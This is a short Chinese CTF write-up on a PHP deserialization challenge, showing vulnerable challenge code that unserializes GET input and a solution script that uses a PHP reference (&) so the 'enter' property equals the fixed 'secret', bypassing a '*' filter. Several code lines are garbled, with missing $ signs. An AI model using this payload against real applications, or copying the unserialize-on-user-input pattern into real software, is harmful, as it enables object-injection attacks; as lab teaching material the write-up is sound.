PHP“引用”漏洞

今日例题:

<?php

highlight_file(FILE);

error_reporting(0);

include("flag.php");

class just4fun {

var $enter;

var $secret;

}

if (isset($_GET['pass'])) {

pass = _GET['pass'];

pass=str_replace('\*','\\\*',pass);

}

o = unserialize(pass);

if ($o) {

$o->secret = "*";

if (o-\>secret === o->enter)

echo "Congratulation! Here is my secret: ".$flag;

else

echo "Oh no... You can't fool me";

}

else echo "are you trolling?";

?>

这道题目其实很容易,其实就构造序列化字符串使enter=secret,但是secret已经写死了,变成*,我貌似只能给enter赋值*才能满足条件,但是 pass=str_replace('\*','\\\*',pass);这里我只要写入*就会被替换成\,所以现在问题变成了怎么在不写入*的情况下让enter=secret,这时就要使用引用漏洞。

引用漏洞:相当于创建了一个快捷方式,可以让你去访问,但是我又不是直接去对原对象赋值。

&$a->secret这里就是一个引用,在前面加个&符号就好

据陈腾师傅所说,所以这道题目的关键根本不在于他们是否都是*,而是在于他们相等,只要加个&就好了

代码如下:

复制代码
<?php


class just4fun{
    var $enter='*';
    var $secret;
}
$a= new just4fun();
$a->enter=&$a->secret;
echo serialize($a);

​

希望本文能够帮助大家。

相关推荐
Godspeed Zhao7 小时前
现代智能汽车系统——总线技术1
网络·汽车·php
stwood00710 小时前
如何在 EC-CUBE 4 中为产品图像启用 WebP 格式图像
php
一人の梅雨10 小时前
VVIC图片搜索接口进阶实战:服装批发场景下的精准识图与批量调度方案
开发语言·机器学习·php
m0_7482299910 小时前
Laravel 2.x:框架的早期特性解析
php·laravel
云游云记11 小时前
php JWT 使用全攻略(firebase/php-jwt 实践笔记)
php·jwt
运筹vivo@12 小时前
BUUCTF: [BSidesCF 2020]Had a bad day
web安全·ctf
三七吃山漆13 小时前
[网鼎杯 2020 朱雀组]phpweb
php·ctf·网鼎杯
CHU72903513 小时前
一番赏盲盒抽卡机小程序:解锁惊喜体验与社交乐趣的多元功能设计
前端·小程序·php
浩浩测试一下15 小时前
DDOS 应急响应Linux防火墙 Iptable 使用方式方法
linux·网络·安全·web安全·网络安全·系统安全·ddos
浩浩测试一下15 小时前
洪水猛兽攻击 Ddos Dos cc Drdos floods区别
安全·web安全·网络安全·系统安全·wpf·可信计算技术·安全架构